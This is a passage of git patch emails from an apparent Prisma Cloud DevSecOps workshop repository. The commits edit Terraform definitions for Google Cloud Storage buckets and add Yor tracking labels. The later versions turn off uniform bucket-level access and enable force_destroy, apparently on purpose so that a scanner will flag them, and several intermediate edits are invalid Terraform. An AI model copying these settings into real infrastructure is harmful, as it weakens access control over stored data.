02:07:15 +0000 Subject: [PATCH 20/51] Update tags (by Yor) --- code/build/gcs.tf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index fa34503f0..aa70caed7 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -22,7 +22,7 @@ resource "google_storage_bucket" "example" { labels = { yor_name = "example" yor_trace = "ef79f2f9-daec-43f0-83eb-c4791a7cb288" - git_commit = "eb17b6f0bc65e7263678819559b52ce606075edf" + git_commit = "1d25aafd8ce362197a86ddadd63b9b96edc5179e" git_file = "code__build__gcs_tf" git_last_modified_at = "2025-08-13-01-55-30" git_last_modified_by = "52453932danielma911" From 1577b384758cb1538d20f6d890e89d965c640edc Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Wed, 13 Aug 2025 16:15:52 +0800 Subject: [PATCH 21/51] Create gcs2.tf --- code/build/gcs2.tf | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 code/build/gcs2.tf diff --git a/code/build/gcs2.tf b/code/build/gcs2.tf new file mode 100644 index 000000000..bf705d18e --- /dev/null +++ b/code/build/gcs2.tf @@ -0,0 +1,31 @@ +terraform { + required_providers { + google = { + source = "hashicorp/google" + version = "~> 5.0" + } + } +} + + +provider "google" { + project = "qwiklabs-gcp-03-ef77dfc22296" + region = "us-central1" +} + +resource "google_storage_bucket" "example" { + name = "demo-${random_id.rand_suffix.hex}" + location = "us-central1" + force_destroy = yes + + uniform_bucket_level_access = false + +} + +resource "random_id" "rand_suffix" { + byte_length = 4 +} + +output "bucket_name" { + value = google_storage_bucket.example.name +} From 188985b7361dadada07f2db818302538bebff693 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 13 Aug 2025 08:16:13 +0000 Subject: [PATCH 22/51] Update tags (by Yor) --- code/build/gcs.tf | 2 +- code/build/gcs2.tf | 4 ++++ 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index aa70caed7..facd05bdf 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -22,7 +22,7 @@ resource "google_storage_bucket" "example" { labels = { yor_name = "example" yor_trace = "ef79f2f9-daec-43f0-83eb-c4791a7cb288" - git_commit = "1d25aafd8ce362197a86ddadd63b9b96edc5179e" + git_commit = "346a7b81609fd766726d3dc5d707950dea20a47a" git_file = "code__build__gcs_tf" git_last_modified_at = "2025-08-13-01-55-30" git_last_modified_by = "52453932danielma911" diff --git a/code/build/gcs2.tf b/code/build/gcs2.tf index bf705d18e..8ca98c729 100644 --- a/code/build/gcs2.tf +++ b/code/build/gcs2.tf @@ -20,6 +20,10 @@ resource "google_storage_bucket" "example" { uniform_bucket_level_access = false + labels = { + yor_name = "example" + yor_trace = "5434efdd-7044-4a1a-965f-d05935013689" + } } resource "random_id" "rand_suffix" { From 599832f3a3b4135e59f29b2b098eeee6a9c1a01a Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 13 Aug 2025 08:16:29 +0000 Subject: [PATCH 23/51] Update tags (by Yor) --- code/build/gcs2.tf | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/code/build/gcs2.tf b/code/build/gcs2.tf index 8ca98c729..f70559213 100644 --- a/code/build/gcs2.tf +++ b/code/build/gcs2.tf @@ -21,8 +21,15 @@ resource "google_storage_bucket" "example" { uniform_bucket_level_access = false labels = { - yor_name = "example" - yor_trace = "5434efdd-7044-4a1a-965f-d05935013689" + yor_name = "example" + yor_trace = "5434efdd-7044-4a1a-965f-d05935013689" + git_commit = "1577b384758cb1538d20f6d890e89d965c640edc" + git_file = "code__build__gcs2_tf" + git_last_modified_at = "2025-08-13-08-15-52" + git_last_modified_by = "52453932danielma911" + git_modifiers = "52453932danielma911" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" } } From d4e46b1ec4131b53370cb661bb002860cc06e024 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Wed, 13 Aug 2025 16:19:59 +0800 Subject: [PATCH 24/51] Delete code/build/gcs.tf --- code/build/gcs.tf | 41 ----------------------------------------- 1 file changed, 41 deletions(-) delete mode 100644 code/build/gcs.tf diff --git a/code/build/gcs.tf b/code/build/gcs.tf deleted file mode 100644 index aa70caed7..000000000 --- a/code/build/gcs.tf +++ /dev/null @@ -1,41 +0,0 @@ -terraform { - required_providers { - google = { - source = "hashicorp/google" - version = "~> 5.0" - } - } -} - - -provider "google" { - project = "qwiklabs-gcp-03-ef77dfc22296" - region = "us-central1" -} - -resource "google_storage_bucket" "example" { - name = "demo-${random_id.rand_suffix.hex}" - location = "us-central1" - force_destroy = false - - uniform_bucket_level_access = true - labels = { - yor_name = "example" - yor_trace = "ef79f2f9-daec-43f0-83eb-c4791a7cb288" - git_commit = "1d25aafd8ce362197a86ddadd63b9b96edc5179e" - git_file = "code__build__gcs_tf" - git_last_modified_at = "2025-08-13-01-55-30" - git_last_modified_by = "52453932danielma911" - git_modifiers = "18621833570__52453932danielma911" - git_org = "danielma911" - git_repo = "prisma-cloud-devsecops-workshop" - } -} - -resource "random_id" "rand_suffix" { - byte_length = 4 -} - -output "bucket_name" { - value = google_storage_bucket.example.name -} From f62a65166e1a6223b081ff7d66b4d163d5c720af Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Wed, 13 Aug 2025 16:20:44 +0800 Subject: [PATCH 25/51] Delete code/build/gcs.tf --- code/build/gcs.tf | 41 ----------------------------------------- 1 file changed, 41 deletions(-) delete mode 100644 code/build/gcs.tf diff --git a/code/build/gcs.tf b/code/build/gcs.tf deleted file mode 100644 index facd05bdf..000000000 --- a/code/build/gcs.tf +++ /dev/null @@ -1,41 +0,0 @@ -terraform { - required_providers { - google = { - source = "hashicorp/google" - version = "~> 5.0" - } - } -} - - -provider "google" { - project = "qwiklabs-gcp-03-ef77dfc22296" - region = "us-central1" -} - -resource "google_storage_bucket" "example" { - name = "demo-${random_id.rand_suffix.hex}" - location = "us-central1" - force_destroy = false - - uniform_bucket_level_access = true - labels = { - yor_name = "example" - yor_trace = "ef79f2f9-daec-43f0-83eb-c4791a7cb288" - git_commit = "346a7b81609fd766726d3dc5d707950dea20a47a" - git_file = "code__build__gcs_tf" - git_last_modified_at = "2025-08-13-01-55-30" - git_last_modified_by = "52453932danielma911" - git_modifiers = "18621833570__52453932danielma911" - git_org = "danielma911" - git_repo = "prisma-cloud-devsecops-workshop" - } -} - -resource "random_id" "rand_suffix" { - byte_length = 4 -} - -output "bucket_name" { - value = google_storage_bucket.example.name -} From 8b993ae363bf58478f1f7a3dbc6b6bb828bf8780 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Wed, 13 Aug 2025 16:25:38 +0800 Subject: [PATCH 26/51] Update gcs2.tf --- code/build/gcs2.tf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/code/build/gcs2.tf b/code/build/gcs2.tf index f70559213..28c6756fa 100644 --- a/code/build/gcs2.tf +++ b/code/build/gcs2.tf @@ -16,7 +16,7 @@ provider "google" { resource "google_storage_bucket" "example" { name = "demo-${random_id.rand_suffix.hex}" location = "us-central1" - force_destroy = yes + force_destroy = true uniform_bucket_level_access = false From a6ce865ef4581ee53076f6643782c3ad3192f1af Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 13 Aug 2025 08:26:00 +0000 Subject: [PATCH 27/51] Update tags (by Yor) --- code/build/gcs2.tf | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/code/build/gcs2.tf b/code/build/gcs2.tf index 28c6756fa..f3ab70385 100644 --- a/code/build/gcs2.tf +++ b/code/build/gcs2.tf @@ -23,9 +23,9 @@ resource "google_storage_bucket" "example" { labels = { yor_name = "example" yor_trace = "5434efdd-7044-4a1a-965f-d05935013689" - git_commit = "1577b384758cb1538d20f6d890e89d965c640edc" + git_commit = "8b993ae363bf58478f1f7a3dbc6b6bb828bf8780" git_file = "code__build__gcs2_tf" - git_last_modified_at = "2025-08-13-08-15-52" + git_last_modified_at = "2025-08-13-08-25-38" git_last_modified_by = "52453932danielma911" git_modifiers = "52453932danielma911" git_org = "danielma911" From 46c49d73bff6439fffd4dfbb592b69f0b18054d1 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Mon, 18 Aug 2025 14:37:37 +0800 Subject: [PATCH 28/51] Create gcs.tf --- code/build/gcs.tf | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 code/build/gcs.tf diff --git a/code/build/gcs.tf b/code/build/gcs.tf new file mode 100644 index 000000000..84cb85141 --- /dev/null +++ b/code/build/gcs.tf @@ -0,0 +1,31 @@ + + + required_providers { + google = { + source = "hashicorp/google" + version = "~> 5.0" + } + } + + + provider "google" { + project = qwiklabs-gcp-03-fa7edfd03d8e + region = "us-central1" + } + + resource "google_storage_bucket" "example" { + name = "demo2-${random_id.rand_suffix.hex}" + location = "us-central1" + force_destroy = true + + uniform_bucket_level_access = false + + } + + resource "random_id" "rand_suffix" { + byte_length = 4 + } + + output "bucket_name" { + value = google_storage_bucket.example.name + } From c601f9b5e1088e75aa240ece7ec7f72187641151 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 06:37:59 +0000 Subject: [PATCH 29/51] Update tags (by Yor) --- code/build/gcs.tf | 46 +++++++++++++++++++++++++--------------------- 1 file changed, 25 insertions(+), 21 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 84cb85141..8f4c76bd6 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -1,31 +1,35 @@ - - required_providers { - google = { - source = "hashicorp/google" - version = "~> 5.0" - } + +required_providers { + google = { + source = "hashicorp/google" + version = "~> 5.0" } +} - provider "google" { - project = qwiklabs-gcp-03-fa7edfd03d8e - region = "us-central1" - } +provider "google" { + project = qwiklabs-gcp-03-fa7edfd03d8e + region = "us-central1" +} - resource "google_storage_bucket" "example" { - name = "demo2-${random_id.rand_suffix.hex}" - location = "us-central1" - force_destroy = true +resource "google_storage_bucket" "example" { + name = "demo2-${random_id.rand_suffix.hex}" + location = "us-central1" + force_destroy = true - uniform_bucket_level_access = false + uniform_bucket_level_access = false + labels = { + yor_name = "example" + yor_trace = "5fa511ef-0e81-478b-b04c-e06af9ada4dc" } +} - resource "random_id" "rand_suffix" { - byte_length = 4 - } +resource "random_id" "rand_suffix" { + byte_length = 4 +} - output "bucket_name" { - value = google_storage_bucket.example.name - } +output "bucket_name" { + value = google_storage_bucket.example.name +} From 3524c9862732010f802917c5ebee215d838fb6de Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Mon, 18 Aug 2025 14:43:15 +0800 Subject: [PATCH 30/51] Update gcs.tf --- code/build/gcs.tf | 21 ++++----------------- 1 file changed, 4 insertions(+), 17 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 8f4c76bd6..b16376df4 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -1,35 +1,22 @@ -required_providers { - google = { - source = "hashicorp/google" - version = "~> 5.0" - } -} - - provider "google" { project = qwiklabs-gcp-03-fa7edfd03d8e region = "us-central1" } -resource "google_storage_bucket" "example" { +resource "google_storage_bucket" "Example" { name = "demo2-${random_id.rand_suffix.hex}" location = "us-central1" force_destroy = true uniform_bucket_level_access = false - - labels = { - yor_name = "example" - yor_trace = "5fa511ef-0e81-478b-b04c-e06af9ada4dc" - } } -resource "random_id" "rand_suffix" { +resource "random_id" "Rand_suffix" { byte_length = 4 } -output "bucket_name" { - value = google_storage_bucket.example.name +output "Bucket_name" { + value = google_storage_bucket.Example.name } From 9120b52350cade3bb867bfb277aed753e57470c7 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 06:43:37 +0000 Subject: [PATCH 31/51] Update tags (by Yor) --- code/build/gcs.tf | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index b16376df4..ccb7a02ad 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -11,6 +11,17 @@ resource "google_storage_bucket" "Example" { force_destroy = true uniform_bucket_level_access = false + labels = { + git_commit = "c601f9b5e1088e75aa240ece7ec7f72187641151" + git_file = "code__build__gcs_tf" + git_last_modified_at = "2025-08-18-06-43-15" + git_last_modified_by = "52453932danielma911" + git_modifiers = "52453932danielma911" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "Example" + yor_trace = "cf1a1d91-f498-45cb-9167-8b32ce2494ce" + } } resource "random_id" "Rand_suffix" { From 750b0e7e1f5b8925cc55f341f15179459d16f330 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 06:44:04 +0000 Subject: [PATCH 32/51] Update tags (by Yor) --- code/build/gcs.tf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index ccb7a02ad..09bbe8c5b 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -12,7 +12,7 @@ resource "google_storage_bucket" "Example" { uniform_bucket_level_access = false labels = { - git_commit = "c601f9b5e1088e75aa240ece7ec7f72187641151" + git_commit = "3524c9862732010f802917c5ebee215d838fb6de" git_file = "code__build__gcs_tf" git_last_modified_at = "2025-08-18-06-43-15" git_last_modified_by = "52453932danielma911" From a799eef73dabfe348bfbb354ff4de7adc4e62c3d Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Mon, 18 Aug 2025 14:45:33 +0800 Subject: [PATCH 33/51] Delete code/build/gcs2.tf --- code/build/gcs2.tf | 42 ------------------------------------------ 1 file changed, 42 deletions(-) delete mode 100644 code/build/gcs2.tf diff --git a/code/build/gcs2.tf b/code/build/gcs2.tf deleted file mode 100644 index f3ab70385..000000000 --- a/code/build/gcs2.tf +++ /dev/null @@ -1,42 +0,0 @@ -terraform { - required_providers { - google = { - source = "hashicorp/google" - version = "~> 5.0" - } - } -} - - -provider "google" { - project = "qwiklabs-gcp-03-ef77dfc22296" - region = "us-central1" -} - -resource "google_storage_bucket" "example" { - name = "demo-${random_id.rand_suffix.hex}" - location = "us-central1" - force_destroy = true - - uniform_bucket_level_access = false - - labels = { - yor_name = "example" - yor_trace = "5434efdd-7044-4a1a-965f-d05935013689" - git_commit = "8b993ae363bf58478f1f7a3dbc6b6bb828bf8780" - git_file = "code__build__gcs2_tf" - git_last_modified_at = "2025-08-13-08-25-38" - git_last_modified_by = "52453932danielma911" - git_modifiers = "52453932danielma911" - git_org = "danielma911" - git_repo = "prisma-cloud-devsecops-workshop" - } -} - -resource "random_id" "rand_suffix" { - byte_length = 4 -} - -output "bucket_name" { - value = google_storage_bucket.example.name -} From f273db0bb1282d387a7caba19bd5290e4869cf9f Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Mon, 18 Aug 2025 14:49:24 +0800 Subject: [PATCH 34/51] Update gcs.tf --- code/build/gcs.tf | 42 ++++++++++++++++-------------------------- 1 file changed, 16 insertions(+), 26 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 09bbe8c5b..a5e88923c 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -1,33 +1,23 @@ + + provider "google" { + project = "qwiklabs-gcp-03-fa7edfd03d8e" + region = "us-central1" + } -provider "google" { - project = qwiklabs-gcp-03-fa7edfd03d8e - region = "us-central1" -} + resource "google_storage_bucket" "example" { + name = "demo-${random_id.rand_suffix.hex}" + location = "us-central1" + force_destroy = true -resource "google_storage_bucket" "Example" { - name = "demo2-${random_id.rand_suffix.hex}" - location = "us-central1" - force_destroy = true + uniform_bucket_level_access = false - uniform_bucket_level_access = false - labels = { - git_commit = "3524c9862732010f802917c5ebee215d838fb6de" - git_file = "code__build__gcs_tf" - git_last_modified_at = "2025-08-18-06-43-15" - git_last_modified_by = "52453932danielma911" - git_modifiers = "52453932danielma911" - git_org = "danielma911" - git_repo = "prisma-cloud-devsecops-workshop" - yor_name = "Example" - yor_trace = "cf1a1d91-f498-45cb-9167-8b32ce2494ce" } -} -resource "random_id" "Rand_suffix" { - byte_length = 4 -} + resource "random_id" "rand_suffix" { + byte_length = 4 + } -output "Bucket_name" { - value = google_storage_bucket.Example.name -} + output "bucket_name" { + value = google_storage_bucket.example.name + } From d35c2db5f0bd943a0855953eab98148e479c73d2 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 06:49:47 +0000 Subject: [PATCH 35/51] Update tags (by Yor) --- code/build/gcs.tf | 43 +++++++++++++++++++++++++++---------------- 1 file changed, 27 insertions(+), 16 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index a5e88923c..953e1709a 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -1,23 +1,34 @@ - - provider "google" { - project = "qwiklabs-gcp-03-fa7edfd03d8e" - region = "us-central1" - } - resource "google_storage_bucket" "example" { - name = "demo-${random_id.rand_suffix.hex}" - location = "us-central1" - force_destroy = true +provider "google" { + project = "qwiklabs-gcp-03-fa7edfd03d8e" + region = "us-central1" +} - uniform_bucket_level_access = false +resource "google_storage_bucket" "example" { + name = "demo-${random_id.rand_suffix.hex}" + location = "us-central1" + force_destroy = true - } + uniform_bucket_level_access = false - resource "random_id" "rand_suffix" { - byte_length = 4 + labels = { + git_commit = "a799eef73dabfe348bfbb354ff4de7adc4e62c3d" + git_file = "code__build__gcs_tf" + git_last_modified_at = "2025-08-18-06-49-24" + git_last_modified_by = "52453932danielma911" + git_modifiers = "52453932danielma911" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "example" + yor_trace = "f007dac4-d8e4-4b89-89ee-12a1940016a3" } +} - output "bucket_name" { - value = google_storage_bucket.example.name - } +resource "random_id" "rand_suffix" { + byte_length = 4 +} + +output "bucket_name" { + value = google_storage_bucket.example.name +} From 7bb7bd9970879a92f950a2a63030d07a01d3a346 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 06:50:06 +0000 Subject: [PATCH 36/51] Update tags (by Yor) --- code/build/gcs.tf | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 953e1709a..e1a0e3624 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -13,9 +13,9 @@ resource "google_storage_bucket" "example" { uniform_bucket_level_access = false labels = { - git_commit = "a799eef73dabfe348bfbb354ff4de7adc4e62c3d" + git_commit = "46c49d73bff6439fffd4dfbb592b69f0b18054d1" git_file = "code__build__gcs_tf" - git_last_modified_at = "2025-08-18-06-49-24" + git_last_modified_at = "2025-08-18-06-37-37" git_last_modified_by = "52453932danielma911" git_modifiers = "52453932danielma911" git_org = "danielma911" From 7f91e0492e5db79bcd3d9f50de95c901aea98526 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Mon, 18 Aug 2025 14:54:46 +0800 Subject: [PATCH 37/51] Update gcs.tf --- code/build/gcs.tf | 13 +------------ 1 file changed, 1 insertion(+), 12 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index e1a0e3624..82f9a4d60 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -6,23 +6,12 @@ provider "google" { } resource "google_storage_bucket" "example" { - name = "demo-${random_id.rand_suffix.hex}" + name = "demo2-${random_id.rand_suffix.hex}" location = "us-central1" force_destroy = true uniform_bucket_level_access = false - labels = { - git_commit = "46c49d73bff6439fffd4dfbb592b69f0b18054d1" - git_file = "code__build__gcs_tf" - git_last_modified_at = "2025-08-18-06-37-37" - git_last_modified_by = "52453932danielma911" - git_modifiers = "52453932danielma911" - git_org = "danielma911" - git_repo = "prisma-cloud-devsecops-workshop" - yor_name = "example" - yor_trace = "f007dac4-d8e4-4b89-89ee-12a1940016a3" - } } resource "random_id" "rand_suffix" { From 55d585da4584032b42b400ae0c494f90e57151eb Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 06:55:07 +0000 Subject: [PATCH 38/51] Update tags (by Yor) --- code/build/gcs.tf | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 82f9a4d60..010ce9ca6 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -12,6 +12,17 @@ resource "google_storage_bucket" "example" { uniform_bucket_level_access = false + labels = { + git_commit = "7bb7bd9970879a92f950a2a63030d07a01d3a346" + git_file = "code__build__gcs_tf" + git_last_modified_at = "2025-08-18-06-54-46" + git_last_modified_by = "52453932danielma911" + git_modifiers = "52453932danielma911" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "example" + yor_trace = "9e4caec0-17ce-4cfe-adb7-5f209ced322f" + } } resource "random_id" "rand_suffix" { From e30bd85c691aacf93d55718c52771d7f8dec17ed Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 06:56:56 +0000 Subject: [PATCH 39/51] Update tags (by Yor) --- code/build/gcs.tf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 010ce9ca6..6a75eabf5 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -13,7 +13,7 @@ resource "google_storage_bucket" "example" { uniform_bucket_level_access = false labels = { - git_commit = "7bb7bd9970879a92f950a2a63030d07a01d3a346" + git_commit = "7f91e0492e5db79bcd3d9f50de95c901aea98526" git_file = "code__build__gcs_tf" git_last_modified_at = "2025-08-18-06-54-46" git_last_modified_by = "52453932danielma911" From df26f6387e78caaf4058087dbd184925a1918234 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Mon, 18 Aug 2025 15:03:37 +0800 Subject: [PATCH 40/51] Update gcs.tf --- code/build/gcs.tf | 18 +++--------------- 1 file changed, 3 insertions(+), 15 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 6a75eabf5..c183c4b85 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -5,30 +5,18 @@ provider "google" { region = "us-central1" } -resource "google_storage_bucket" "example" { +resource "google_storage_bucket" "Example" { name = "demo2-${random_id.rand_suffix.hex}" location = "us-central1" force_destroy = true uniform_bucket_level_access = false - - labels = { - git_commit = "7f91e0492e5db79bcd3d9f50de95c901aea98526" - git_file = "code__build__gcs_tf" - git_last_modified_at = "2025-08-18-06-54-46" - git_last_modified_by = "52453932danielma911" - git_modifiers = "52453932danielma911" - git_org = "danielma911" - git_repo = "prisma-cloud-devsecops-workshop" - yor_name = "example" - yor_trace = "9e4caec0-17ce-4cfe-adb7-5f209ced322f" - } } -resource "random_id" "rand_suffix" { +resource "random_id" "Rand_suffix" { byte_length = 4 } -output "bucket_name" { +output "Bucket_name" { value = google_storage_bucket.example.name } From 2c2926f6761ab7fb1572a07f4f3b9d64f92f2c73 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 07:03:57 +0000 Subject: [PATCH 41/51] Update tags (by Yor) --- code/build/gcs.tf | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index c183c4b85..7d14af7c5 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -11,6 +11,17 @@ resource "google_storage_bucket" "Example" { force_destroy = true uniform_bucket_level_access = false + labels = { + git_commit = "e30bd85c691aacf93d55718c52771d7f8dec17ed" + git_file = "code__build__gcs_tf" + git_last_modified_at = "2025-08-18-07-03-37" + git_last_modified_by = "52453932danielma911" + git_modifiers = "52453932danielma911" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "Example" + yor_trace = "08b38d2b-6def-409e-bbbd-b41165251c1e" + } } resource "random_id" "Rand_suffix" { From 9ed82b2e5d6820f9cd19fc6069385d6b8e1aa33f Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 07:04:18 +0000 Subject: [PATCH 42/51] Update tags (by Yor) --- code/build/gcs.tf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 7d14af7c5..e3bea52f2 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -12,7 +12,7 @@ resource "google_storage_bucket" "Example" { uniform_bucket_level_access = false labels = { - git_commit = "e30bd85c691aacf93d55718c52771d7f8dec17ed" + git_commit = "df26f6387e78caaf4058087dbd184925a1918234" git_file = "code__build__gcs_tf" git_last_modified_at = "2025-08-18-07-03-37" git_last_modified_by = "52453932danielma911" From 1312da753697eb030b8914b7b192b1a81d0b8fc5 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Mon, 18 Aug 2025 15:06:33 +0800 Subject: [PATCH 43/51] Update gcs.tf --- code/build/gcs.tf | 15 ++------------- 1 file changed, 2 insertions(+), 13 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index e3bea52f2..fbfcbc548 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -6,22 +6,11 @@ provider "google" { } resource "google_storage_bucket" "Example" { - name = "demo2-${random_id.rand_suffix.hex}" + name = "demo2-${random_id.Rand_suffix.hex}" location = "us-central1" force_destroy = true uniform_bucket_level_access = false - labels = { - git_commit = "df26f6387e78caaf4058087dbd184925a1918234" - git_file = "code__build__gcs_tf" - git_last_modified_at = "2025-08-18-07-03-37" - git_last_modified_by = "52453932danielma911" - git_modifiers = "52453932danielma911" - git_org = "danielma911" - git_repo = "prisma-cloud-devsecops-workshop" - yor_name = "Example" - yor_trace = "08b38d2b-6def-409e-bbbd-b41165251c1e" - } } resource "random_id" "Rand_suffix" { @@ -29,5 +18,5 @@ resource "random_id" "Rand_suffix" { } output "Bucket_name" { - value = google_storage_bucket.example.name + value = google_storage_bucket.Example.name } From 5dabc91766cd0d228d54585b2ef7eabb5d236e7c Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 07:06:56 +0000 Subject: [PATCH 44/51] Update tags (by Yor) --- code/build/gcs.tf | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index fbfcbc548..b3673bfb2 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -11,6 +11,17 @@ resource "google_storage_bucket" "Example" { force_destroy = true uniform_bucket_level_access = false + labels = { + git_commit = "9ed82b2e5d6820f9cd19fc6069385d6b8e1aa33f" + git_file = "code__build__gcs_tf" + git_last_modified_at = "2025-08-18-07-06-33" + git_last_modified_by = "52453932danielma911" + git_modifiers = "52453932danielma911" + git_org = "danielma911" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "Example" + yor_trace = "b71fbd0b-de17-4226-98e1-6b56de4d4db0" + } } resource "random_id" "Rand_suffix" { From 1e10b0e771ee76f1c595fdd99b6b7e5ea3deceb0 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Mon, 18 Aug 2025 07:08:55 +0000 Subject: [PATCH 45/51] Update tags (by Yor) --- code/build/gcs.tf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index b3673bfb2..6cf1afcb5 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -12,7 +12,7 @@ resource "google_storage_bucket" "Example" { uniform_bucket_level_access = false labels = { - git_commit = "9ed82b2e5d6820f9cd19fc6069385d6b8e1aa33f" + git_commit = "1312da753697eb030b8914b7b192b1a81d0b8fc5" git_file = "code__build__gcs_tf" git_last_modified_at = "2025-08-18-07-06-33" git_last_modified_by = "52453932danielma911" From 1b5901f3da257ba090b40baca9750d15a6309e62 Mon Sep 17 00:00:00 2001 From: Daniel Ma <52453932+danielma911@users.noreply.github.com> Date: Mon, 18 Aug 2025 15:22:34 +0800 Subject: [PATCH 46/51] Update gcs.tf --- code/build/gcs.tf | 2 -- 1 file changed, 2 deletions(-) diff --git a/code/build/gcs.tf b/code/build/gcs.tf index 6cf1afcb5..5f22da4a7 100644 --- a/code/build/gcs.tf +++ b/code/build/gcs.tf @@ -1,5 +1,3 @@ - - provider "google" { project = "qwiklabs-gcp-03-fa7edfd03d8e" region = "us-central1" From b97ecf487a1cc3d9f97b349d50b0330f6d85fb4f Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" 